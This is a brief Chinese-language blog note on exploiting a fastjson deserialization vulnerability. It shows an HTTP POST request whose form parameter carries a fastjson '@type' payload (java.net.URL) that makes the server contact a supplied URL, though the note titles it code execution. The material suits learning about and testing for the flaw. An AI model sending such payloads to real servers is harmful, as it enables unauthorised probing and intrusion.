【笔记】fastjson代码执行漏洞利用

发表于 更新于 阅读次数:

前言

fastjson由反序列化漏洞引起的代码执行漏洞利用

漏洞利用

  • 如果处理的方法中调用FastJSON将JSON字符串转换为Java对象,且接收了请求参数作为JSON字符串变量,可以修改请求参数为payload
request
1
2
3
4
POST http://127.0.0.1:8080/
Content-Type: application/x-www-form-urlencoded

x=Set[{"@type":"java.net.URL", "val": "<url>"}]

完成